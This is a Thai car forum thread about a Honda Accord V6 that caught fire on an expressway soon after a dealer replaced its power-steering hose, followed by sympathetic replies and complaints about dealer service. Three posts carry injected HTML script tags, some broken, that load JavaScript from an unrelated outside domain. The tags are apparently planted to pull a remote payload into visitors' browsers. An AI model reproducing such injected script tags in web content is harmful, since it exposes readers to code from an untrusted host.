ตอบ
thebump


เข้าร่วม: 22 ตุลา 2008
ตอบ: 381

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 472
ให้คำขอบคุณ: 670

ที่อยู่: ประชาอุทิศ ทุ่งครุ กทม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 3 ตุลา 2009 15:10 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
เรื่องที่ใครๆก็ไม่อยากให้เกิดกับรถตัวเอง
จากเรื่องจริงครับ
"ผมเป็นเจ้าของรถเองคับ

รถไม่ได้ติดแก๊ซคับ เป็นรถเดิม อายุโดยประมาณ 3 ปี 3 เดือน วิ่ง 113,XXX กม.

ท่านสามารถอ่านได้จาก Saab Club หรือ Accord Club ที่ผมเป็นสมาชิกคับ

ตอนนี้เหตุการณ์ที่เกิดขึ้น ถ้าจะสรุปกันทางเทคนิคว่าเกิดจากจุดใด คงยังสรุปไม่ได้ เพราะตอ้งรอ
1. ประกันฝ่ายผม
2. พนักงานสอบสวน
3. ประกันของศูนย์ HONDA
4. พนักงานเทคนิคของ HONDA
ซึ่งก็ไม่รู้อีกนานหรือป่าวกว่าจะสรุปว่าเป็นที่อะไร

แต่ถ้าจะสรุปเป็น Fact ของเหตุการณ์ที่เกิดขึ้น ตามที่ลงบันทึกประจำวันไว้ สามารถสรุปได้ดังนี้

ผม นำรถเข้าซ่อมเพื่อเปลียนท่อระบบน้ำมันเพาเวอร์ ซึ่งเป็นการแจ้งให้รถ HONDA ACCORD V6 รุ่น 2003-2007 เข้าไปเปลี่ยน โดยเป็นเอกสารจาก HONDA ประเทศไทย ซึ่งนำรถเข้าไปวันพุธที่ 23/09/09 และได้รับรถออกมาเมื่อวันศุกร์ที่ 25/09/09

ผมรับรถออกมาจากศูนย์เมื่อเวลาประมาณ 17.30 น. และได้ขับขึ้นทางด่วนทันที (เข้าใจว่าเรียกทางด่วนตรงนั้นว่าด่านโยธินพัฒนา) หลังจากขับถึงบริเวณโค้งพระราม 9 ก็เกิดอาการพวงมาลัยแข็ง ซึ่งในใจก็คาดเดาว่าน่าจะมาจากระบบเพาเวอร์บกพร่องแน่นอน (เพิ่งเข้าไปทำมาด้วย) จึงได้ตัดสินใจลงทางด่วนบริเวณคลองตันเพื่อวกกลับขึ้นทางด่วนเพื่อกลับไป ศูนย์

หลังจากขึ้นทางด่วนมาแล้ว ขับมาถึงบริเวณพระราม 9 รถเริ่มชลอตัว จึงเริ่มได้กลิ่นไหม้เหมือนพวกน้ำมันเครื่อง (ซึ่งกรณีนี้ผมว่าน่าจะเป็นน้ำมันเพาเวอร์) ไหม้ และเริ่มเห็นควันขาว ผมจึงได้โทรเข้าศูนย์ว่าจะให้ทำอย่างไร จะขับต่อได้หรือไม่ ซึ่งทางศูนย์แนะนำให้จอดและให้รถของทางด่วนลากไปส่งที่ศูนย์ ผมจึงได้ตบเข้าซ้าย จอดใกล้บริเวณตู้โทรศัพท์ แต่เนื่องจากขณะนั้นฝนยังตกพรำ จึงยังไม่ได้ลงจากรถ จอดรถซักพัก ก็พยามโทร 1543 จากมือถือแต่ไม่ติด ไม่นานก็พบว่ามีเปลวเพลิงลุกขึ้นมาระหว่างฝากระโปรง และ กระจกบังลมหน้า จึงได้รีบลงจากรถ

เพลิงไหม้รุนแรงมาก โดยขณะนั้นรถก็ติดมากเพราะเป็นเวลาเย็นและก่อนหน้านั้นฝนตกหนักมาก ทำให้รถฉีดน้ำต้องใช้เวลาพักใหญ่กว่าจะมาถึง อย่างไรก็ตามระหว่างรอรถน้ำ ก็มีรถกู้ภัย ได้ใช้ถังดับเพลิงมือถือ เพื่อเข้าทำการดับเพลิง ใช้หมดไป 4 ถังก็ไม่สามารถควบคุมเพลิงได้ ต้องรอรถน้ำ

หลังเกิดเหตุ เจ้าหน้าที่ทางด่วนได้ลากรถไป สน.ทางด่วนเพื่อลงบันทึกประจำวัน และเคลียค่าเสียหาย (เข้าใจว่าประกันเป็นผู้จัดการไปก่อน) ประกอบด้วย คชจ ถังดับเพลิง 4 ถัง คชจ รถน้ำ และพื้นทางสียหาย ไม่แน่ใจว่ากี่ ตร.ม.

จบ เรื่องจาก สน. ประกันได้จัดรถยกเพื่อนำไปไว้ที่ ศูนย์HONDA รอการตรวจพิสูจน์ ซึ่งศูนย์ก็รับทราบข้อมูลของการเกิดเหตุตั้งแต่ตอนที่เกิดเหตุเพลิงไหม้

นอก จากนี้ผมได้แจ้งปัญหาผ่าน WEB ของ HONDA ไปแล้วเมื่อวันอาทิตย์ 27/09/09 แต่ยังไม่ได้รับการติดต่อกลับมาแต่อย่างใด วันนี้ประกันผมเข้าไป พร้อมกับพนักงานสอบสวน แต่ทาง HONDA ยังไม่มีใครเข้าไป นอกจากคนที่ศูนย์ ซึ่งก็อยู่ที่ศูนย์อยู่แล้ว

วันนี้ผมก็แจ้งไปแล้วว่า ไม่พอใจมากกับการที่ไม่เห็นความคืบหน้าในการดำเนินการใดๆเลย เนื่องจาก case ผมไม่ใช่เรื่องเล็ก ไม่ใช่รถยางแบน กระบวนการพิสูจในทางเทคนิคเป็นไงก็ต้องเป็นงั้น อันนั้นผมเข้าใจ แต่เหตุที่เกิดขึ้น สำหรับผมมันชัดเจน เพราะเราเอาเข้าไปทำระบบพวงมาลัย (ซึ่งแต่เดิมก็ปกติ เข้าไปเพราะแจ้งให้เราไปทำ) พอออกมาจากศูนย์ไม่นาน ไม่น่าเกิน 3-5 กม/ 5-10 นาที รถก็เกิดปัญหา แล้วเป็นปัญหาที่ระบบพวงมาลัยด้วย แล้วก็จบที่ไฟไหม้ แต่ผมมันไม่เห็นอะไรนอกจากบอกว่ารอประกัน รอตรวจสอบ

ผมเองก็ไม่ใช่คน โวยวาย ซึ่งผมก็บอกศูนย์ไปว่า ผมไม่โวยวายไม่ใช่ว่า Honda จะเฉยๆ นิ่งนอนใจได้นะ ผมเองก็ไม่อยากเอาซากรถไปเผาซ้ำ ประจานให้เป็นเรื่อง เหมือนการทุบ CRV เพราะเป็นเรื่องแล้วมันจะยาวไปอีก เหนื่อยทั้งคู่ ...... พูดไปอีกยาวเลยครับ.....

สุดท้าย ทางศูนย์ก็บอกว่าเข้าใจผม และเดินเรื่องอยู่ ไม่ได้นิ่งนอนใจ แต่ไม่รู้จะทำอย่างไรได้บ้าง เพราะมันก็ต้องเป็นไปตามกระบวนการในการพิสูจน์ ซึ่งผมก็ย้อนว่า เข้าใจ พิสูจน์ก็พิสูจน์กันไป แต่ผมขับออกจากศูนย์พี่แล้วเกิดปัญหา สำหรับผมมันชัด ซึ่งพี่จะพิสูจน์ก็พิสูจน์ไป แต่เฉพาะหน้าพี่ก็ต้องมีการแก้ไขปัญหาด้วย แยกออกจากกัน ไม่ใช่รวมกันไปหมด ไม่งั้นผมก็แย่ เพราะไม่รู้เรื่องจะจบเมื่อไหร่ จบยังไง เพิ่งจะรอดตายมา แล้วต้องเหนื่อย + เสียเวลาอีกเท่าไหร่ก็ไม่รู้

หลังจากกลับมาแล้ว ศูนย์ก็โทรมาแจ้งว่าเบื้องต้นจะส่ง Civic มาให้ใช้เป็นการชั่วคราว เพื่อบรรเทาความเดือดร้อนที่ไม่มีรถ ซึ่งผมเองก็ยังไม่ได้บอกรับ หรือไม่รับ (ตอนแรกบอกว่าไม่มีรถสำรอง ขอเป็นช่วยค่าน้ำมันได้หรือป่าว .... แล้วผมจะไปเติมใส่อะไรคับ จักรยานหรือ)

ก็คงต้องดูต่อไปว่าจะออกมาอย่างไร "

ขอบคุณครับ

จากคุณ : jo_rs


Attached File :
ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
Attached File :
ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
Attached File :
ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
Attached File :
ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
.................
.................
black_boy


ชื่อเล่น: โบ๊ต

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2031

นายทะเบียน
นายทะเบียน

ได้รับคำขอบคุณ: 1969
ให้คำขอบคุณ: 706

ที่อยู่: ES อยู่ไหน ก็ที่นั่นแหล่ะ ที่อยู่ผม
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 3 ตุลา 2009 15:17 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
แล้วจะเป็นงัยต่อนี่อยากรู้
thebump


เข้าร่วม: 22 ตุลา 2008
ตอบ: 381

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 472
ให้คำขอบคุณ: 670

ที่อยู่: ประชาอุทิศ ทุ่งครุ กทม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 3 ตุลา 2009 15:21 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
vevev พิมพ์ว่า:
แล้วจะเป็นงัยต่อนี่อยากรู้

ใจเย็นๆครับผมก็รอฟังข่าวจากเจ้าของเหมือนกัน "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
แต่ก็เป็นเรื่องที่น่าสนใจเข้าศูนย์ก็ใช่ว่าจาดีไปหมด
ได้รับคำขอบคุณจาก: <Mies>  hacker 
thebump


เข้าร่วม: 22 ตุลา 2008
ตอบ: 381

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 472
ให้คำขอบคุณ: 670

ที่อยู่: ประชาอุทิศ ทุ่งครุ กทม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 3 ตุลา 2009 15:26 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
Update ครับ

จากเจ้าของรถ
"ขณะนี้ได้รับแจ้งจากศูนย์บางนาว่า ได้รับ mail ที่ผมส่งไปแล้ว ทาง Honda จะได้ส่งช่างเทคนิคมาตรวงจสอบ และทางผู้ใหญ่จะขอนัดคุยด้วย

ทั้งนี้พี่ที่ Accord Club ก็ได้ให้ความช่วยเหลือในการประสานกับ Honda ประเทศไทยด้วย

คืบหน้าอย่างไรผมจะได้รายงานต่อครับ

ขอบคุณครับ

จากคุณ : jo_rs"
ได้รับคำขอบคุณจาก: hacker  kittidech  TOrunTO  kaisuh 
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 3 ตุลา 2009 15:35 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
อืมมมม อันตราย แล้วนะเนี่ย

ได้ข่าว FD ก็มีคันนึงนี่ ครับ พวงมาลัย แข็ง
ได้รับคำขอบคุณจาก: hacker 
jk2475


ชื่อเล่น: เล็ก

เข้าร่วม: 02 ตุลา 2008
ตอบ: 2852

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1893
ให้คำขอบคุณ: 4964

ที่อยู่: Laemsing Chanthaburi
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 3 ตุลา 2009 15:47 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
โอ้โห..เสียใจด้วยนะครับ ตัวเองปลอดภัยก็ดีแล้วครับ
ขอเอาใจช่วยให้เรื่องจบด้วยดีโดยเร็วด้วยครับ
ได้รับคำขอบคุณจาก: hacker 
ENJOY HONDA


เข้าร่วม: 20 พฤศจิกา 2008
ตอบ: 1346

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1186
ให้คำขอบคุณ: 479

ที่อยู่: Bangkok
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 3 ตุลา 2009 17:26 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
เสียใจด้วยครับกับเหตุการณ์ที่เกิดขึ้น...

ขอให้เคลียได้ไวไวนะครับ เอาใจช่วยครับ... <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: hacker 
S_panbumrung


ชื่อเล่น: ยศ

เข้าร่วม: 04 ตุลา 2008
ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1176
ให้คำขอบคุณ: 961

ที่อยู่: Chachoengsao / Chonburi
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 3 ตุลา 2009 17:27 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
เห็นหลายกระทู้แระ เอารถออกจาก 0 แล้วมีปัญหาตลอด เหนื่อแทนครับ
ยังไงก็เป็นกำลังใจให้นะครับ เอาใจช่วย
ได้รับคำขอบคุณจาก: hacker 
Jeab22


ชื่อเล่น: เจี๊ยบ

เข้าร่วม: 14 มกรา 2009
ตอบ: 1724

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1690
ให้คำขอบคุณ: 3102

ที่อยู่: ลำลูกกา/นนทบุรี/สุวรรณภูมิ
ปี: 2004
สี: แดง แรลไล (R-513)
เสาร์, 3 ตุลา 2009 17:30 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
เข้าศูนย์ก็ไม่น่าไว้ใจแล้ว...เฮ้อ
ได้รับคำขอบคุณจาก: hacker 
note^-^


ชื่อเล่น: โน๊ต

เข้าร่วม: 23 ตุลา 2008
ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1988
ให้คำขอบคุณ: 501

ที่อยู่: สมุทรสาคร-นครชัยศรี
ปี: 2003
เสาร์, 3 ตุลา 2009 18:15 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ติดตามดูต่อครับ ยังไงก็เอาใช่วยครับ
ได้รับคำขอบคุณจาก: hacker 
toey_rx


เข้าร่วม: 08 ตุลา 2008
ตอบ: 290

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 386
ให้คำขอบคุณ: 23
เสาร์, 3 ตุลา 2009 18:28 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
เคยเป็นเหมือนกัน ครับ แต่แก้ไขทัน เพราะว่า สาย พาเวอร์ รุ๋นที่ติดรถ มามันไม่มี ที่กันความร้อน ครับ
และอีกอย่างนึง คือ จานเบรก จะมีปัญหา ตลอด
ได้รับคำขอบคุณจาก: hacker 
DRINK


เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ที่อยู่: Paris + Bangkok + Uttaradit + Phitsanulok
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 3 ตุลา 2009 18:54 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
กลัวรถตัวเองจริงๆ
ได้รับคำขอบคุณจาก: hacker 
จ่าฝูง


เข้าร่วม: 06 ตุลา 2008
ตอบ: 473

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 297

ที่อยู่: ถิ่นนักปราชญ์ เมืองดอกบัว
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 3 ตุลา 2009 19:00 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ทำไมพักนี้ได้ยินแต่ปัญหาที่เกิดจากศูนย์นะ


ได้รับคำขอบคุณจาก: hacker 
biggsnui


ชื่อเล่น: หนุ่ย

เข้าร่วม: 18 มิถุนา 2009
ตอบ: 854

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1300
ให้คำขอบคุณ: 1618

ที่อยู่: The Gang South Pattaya
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 3 ตุลา 2009 21:23 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
น่ากลัวจัง เหวอๆๆ



ยังไงฝากคุณ thebump อัพเดตจนถึงตอนจบด้วยนะครับ
อยากรู้ว่าฮอนด้าจะรับผิดชอบยังไง
เป็นกำลังใจให้เจ้าของรถด้วยนะครับ
ได้รับคำขอบคุณจาก: hacker 
ahingrace


ชื่อเล่น: หนึ่ง

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2984

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6506
ให้คำขอบคุณ: 11382

ที่อยู่: กรุงเทพ โคราช สระบุรี (THE GANG)
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 3 ตุลา 2009 21:36 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ศูนย์ไหนเนี่ย ทำไมจึงเกิดเหตุได้ครับ ถามช่างโดยตรงก่อนเลยทำไรกับมันบ้าง
บางครั้งช่างเนี่ยแหละที่มองข้ามความ ชำนาญของตัวเอง เห็นมาเยอะแถมโดน
มากับตัวเองแล้ว แต่ไม่ร้ายแรงก็จริง แต่มันอาจนำพาไปเกิดเรื่องที่ไม่คาดคิด
อย่างกรณีแบบนี้ ระวังหรือต้องคอยเช็คถามให้ละเอียดที่เราสงสัย ไม่ต้องไปเกรงใจใคร
ทั้งนั้น เสียเงินทั้งที เสียใจด้วยครับแล้วได้เรื่องไงจะรอฟังข่าวครับ
ได้รับคำขอบคุณจาก: hacker 
AUM[SilveR]


เข้าร่วม: 14 มกรา 2009
ตอบ: 1151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 159

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 3 ตุลา 2009 23:41 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
โอ้โห อันตรายจิงๆ น้ำมันพาวเวอร์นี่มันไหม้ไวนะ ขอให้ได้เรื่องไวๆนะครับ
ได้รับคำขอบคุณจาก: hacker 
notegp


ชื่อเล่น: โน๊ต

เข้าร่วม: 13 พฤษภาคม 2009
ตอบ: 1461

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1272
ให้คำขอบคุณ: 1753

ที่อยู่: สัตหีบ
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 4 ตุลา 2009 00:23 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ได้รับคำขอบคุณจาก: hacker 
Aek-4484


ชื่อเล่น: เอก

เข้าร่วม: 01 ตุลา 2008
ตอบ: 229

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 290
ให้คำขอบคุณ: 89

ที่อยู่: Chonburi Amatanakorn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 4 ตุลา 2009 00:33 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
รอฟังข่าวครับว่า Honda จะทำยังไง เสียชื่อเสียงแน่ถ้าไม่รับผิดชอบ ส่วนตัวเองกลัวการเข้าศูนย์แล้วนี่
ได้รับคำขอบคุณจาก: hacker 
Nut_Au_Together


ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 4 ตุลา 2009 01:22 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
เห็นรถเเล้วน่าเห็นใจเจ้าของรถครับ เเต่โชคดีเเล้วที่คนขับไม่เป็นอะไร เอาใช่ช่วยให้เคลียร์ปัญหาได้เร็ว ๆ นะครับ
ได้รับคำขอบคุณจาก: hacker 
thebump


เข้าร่วม: 22 ตุลา 2008
ตอบ: 381

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 472
ให้คำขอบคุณ: 670

ที่อยู่: ประชาอุทิศ ทุ่งครุ กทม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 4 ตุลา 2009 01:58 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ล่าสุดดูเหมือนว่ามีอึกหนึ่งกระแสจากการตรวจสอบ
พบว่าบางศูนย์ใช้นำ้มันก๊าซล้างเครื่องให้สงสัยยังมีคราบติดอยู่ประจบเหมาะกับนำ้มันเพาเวอร์อาจจะรั่วออกจากท่อไปเจอความร้อนเข้าก็เลยเกิดประกายไฟเข้าครับ.....เป็นข้อสันนิฐานจากเจ้าหลายๆผู้รู้นะครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker  kaisuh 
xcyber


ชื่อเล่น: เอ็กซ์

เข้าร่วม: 30 ตุลา 2008
ตอบ: 1105

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1281
ให้คำขอบคุณ: 217

ที่อยู่: เจริญนคร
ปี: 2001
อาทิตย์, 4 ตุลา 2009 04:32 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ทำไมเด๋วนี้ Honda มีแต่ข่าวไม่ค่อยดีเลย
ได้รับคำขอบคุณจาก: hacker 
soloshot


ชื่อเล่น: แฟลช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 1243

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2428
ให้คำขอบคุณ: 1275

ที่อยู่: ประชาอุทิศ (ทุ่งครุ)
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 4 ตุลา 2009 06:34 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ใจเย็นๆ
ขอให้ เคลียร์จบ ไวๆนะครับ
ได้รับคำขอบคุณจาก: hacker 
genius


ชื่อเล่น: อัจ

เข้าร่วม: 22 กุมภา 2009
ตอบ: 526

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 626
ให้คำขอบคุณ: 421

ที่อยู่: Samutprakarn
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 4 ตุลา 2009 09:06 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ขนาดศูนย์ยังไม่น่าไว้วางใจแล้วอย่างนี้จะไปเช็คสภาพรถกันที่ไหนหล่ะเนี๊ยะ.. เอาใจช่วยน่ะครับขอให้ผลจบลงอย่างที่น่าพอใจน่ะครับ
ได้รับคำขอบคุณจาก: hacker 
ake_es


ชื่อเล่น: เอก

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

ที่อยู่: ดอนเมือง
อาทิตย์, 4 ตุลา 2009 11:03 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ติดตามตอนต่อไปป.น่ากลัวแฮะ
ได้รับคำขอบคุณจาก: hacker 
parman


ชื่อเล่น: สอง

เข้าร่วม: 12 กุมภา 2009
ตอบ: 262

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 230
ให้คำขอบคุณ: 655

ที่อยู่: saraburi
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 4 ตุลา 2009 13:02 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
แล้วยังงี้ผมจะเข้า 0 ดีไหมนี่..ใกล้ถึงเช็คระยะแล้วด้วยซี...
ได้รับคำขอบคุณจาก: hacker 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 4 ตุลา 2009 14:39 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ความเห็นส่วนตัวน่ะ เดี๋ยวนี้ 0 ผมว่าไม่ค่อยมี
มาตราฐาน ทำงานแบบลวกๆ ไม่ค่อยรอบคอบ
ถ้าใครเคยเข้า 0 บ่อยๆ คงมีความรู้สึกเหมือนผมอ่ะ
เพราะผมเข้า 0 ตลอดเวลาตั้งแต่ซื้อรถมา 4 ปีก่า เลยอ่ะ
รู้ว่าไม่ค่อยดีก็ยังจะเข้า งง เหมือนกัน


ปล.ล่าสุดเข้าเช็คระยะถ่ายน้ำมันเครื่อง 0 มันยังทำสายข้อต่อแก๊ส
ของผมรั่วเลย งัยก็เพื่อนๆ เวลาเอารถเข้า 0 ก็เช็ครถตัวเองด้วยน่ะคับ....
ได้รับคำขอบคุณจาก: <Mies>  hacker 
Tinkky


ชื่อเล่น: โอ๋หลังวัง

เข้าร่วม: 02 ตุลา 2008
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 655
ให้คำขอบคุณ: 667

ที่อยู่: รังสิต - อยุธยา - ลพบุรี
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 4 ตุลา 2009 14:48 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
Case นี้ ไม่แน่ใจว่าเป็นของ Honda Automobile Thailand หรือ Honda Trading นะครับ ที่ต้องเคลียร์ให้กับลูกค้า

แต่เขาน่าจะมีการออกประเมินศูนย์บริการประจำปีบ้าง เอาแบบมาไม่ให้รู้เนื้อรู้ตัว

จะได้เห็นสภาพการทำงานที่แท้จริง แล้วก็ประเมินกันตรงนั้นเลย

ผิด ถูก ให้คะแนน แนะนำ แก้ไข รวมทั้งอาจจะตัดสิทธิการให้เป็นศูนย์บริการกันไปเลย ก็น่าจะดีครับ

(ถ้าในที่นี่มีคนของ Honda ฟังอยู่....ผมขอ comment ไว้เลยครับ)

เหมือนกันกับที่ Honda ออกไป audit suppliers ทั้งหลายนั่นแหละครับ

ปัญหามันป้องกันได้ ถ้าตรวจสอบพบตั้งแต่เนิ่นๆ หากไม่เริ่ม หรือเริ่มแล้วแต่ยังไม่เกิดประสิทธิผล

ก็ต้องปรับปรุงต่อครับ.....ผมเห็นว่า case นี้น่าจะมีทางออกที่ดีด้วยกันทั้งสองฝ่ายนะครับ

Honda ไม่น่าเสี่ยงเอาชื่อมาขายให้เน่ามากไปกว่านี้ครับ

เป็นกำลังใจให้นะครับ
ได้รับคำขอบคุณจาก: hacker 
koonaea


ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 4 ตุลา 2009 16:17 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
น่ากลัวมากเลยอ่ะคร้าบ
ได้รับคำขอบคุณจาก: hacker 
<Mies>


ชื่อเล่น: มี่

เข้าร่วม: 03 ธันวา 2008
ตอบ: 1463

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1962
ให้คำขอบคุณ: 1373

ที่อยู่: ขอนแก่น
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 4 ตุลา 2009 17:01 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
jonatan พิมพ์ว่า:
ความเห็นส่วนตัวน่ะ เดี๋ยวนี้ 0 ผมว่าไม่ค่อยมี
มาตราฐาน ทำงานแบบลวกๆ ไม่ค่อยรอบคอบ
ถ้าใครเคยเข้า 0 บ่อยๆ คงมีความรู้สึกเหมือนผมอ่ะ
เพราะผมเข้า 0 ตลอดเวลาตั้งแต่ซื้อรถมา 4 ปีก่า เลยอ่ะ
รู้ว่าไม่ค่อยดีก็ยังจะเข้า งง เหมือนกัน


ปล.ล่าสุดเข้าเช็คระยะถ่ายน้ำมันเครื่อง 0 มันยังทำสายข้อต่อแก๊ส
ของผมรั่วเลย งัยก็เพื่อนๆ เวลาเอารถเข้า 0 ก็เช็ครถตัวเองด้วยน่ะคับ....


เห็นด้วยกับพี่โจ ครับ

ผมไม่เข้า 0 จะปีนึงได้และ

